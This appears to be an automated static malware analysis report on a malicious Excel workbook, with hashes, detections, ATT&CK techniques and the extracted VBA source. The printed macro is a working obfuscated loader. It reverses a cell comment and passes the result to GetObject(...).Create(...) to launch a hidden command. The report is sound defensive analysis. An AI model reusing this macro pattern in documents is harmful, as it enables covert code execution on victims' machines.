Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 10ec185be9504c09…

MALICIOUS

Office (OOXML)

136.9 KB Created: 2015-06-05 18:17:20 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2020-09-15
MD5: c1ad13e65ca16578fe507339eb92ee40 SHA-1: 99d5e5f80d56a97aed19a49285de064f268f2377 SHA-256: 10ec185be9504c09a3c52c97abc34b879f4224459f154a57a56ab15df1829208
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample is an OOXML document containing VBA macros. The macros utilize the GetObject function, which is often abused to execute arbitrary code. The script attempts to create an object using a string constructed from reversed parts of a comment, likely to obfuscate the payload. The ClamAV detection of Win.Malware.Agent-9377073-0 further supports a malicious classification.

Heuristics 3

  • ClamAV: Win.Malware.Agent-9377073-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Malware.Agent-9377073-0
  • VBA project inside OOXML medium 1 related finding OOXML_VBA
    Document contains a VBA project — VBA macros present
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1333 bytes
SHA-256: 36dd99bb7a053cf703cf5fa176134e67e0d4ae0056a5b948ca7102028a6b6e7e
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Activate()
Range("T540").Value = 770.15
End Sub
  



Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Public Sub Worksheet_Change(ByVal target As Range)
Dim JFKB, eoczh, KupGdv

With ThisWorkbook
  JFKB = .ActiveSheet.Range("D500").Comment.Text
 
  eoczh = Split(Reverse(JFKB), "###")

  KupGdv = eZoKg(eoczh(1), eoczh(0))
  End With
End Sub

Function eZoKg(A2, A1)
Dim GKtRGIw, ppUOJPSB, pPfo
Set GKtRGIw = GetObject(A1)
ppUOJPSB = A2

pPfo = GKtRGIw.Create(ppUOJPSB)

End Function

Function Reverse(Text)
    Dim i As Integer
    Dim StrNew As String
    Dim strOld As String
    strOld = Trim(Text)
    For i = 1 To Len(strOld)
      StrNew = Mid(strOld, i, 1) & StrNew
    Next i
    Reverse = StrNew
End Function
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 19456 bytes
SHA-256: b276edc0c93016eef12dc1f17fb1a6de5381ef0f00b87223fb5351c2b1018bfd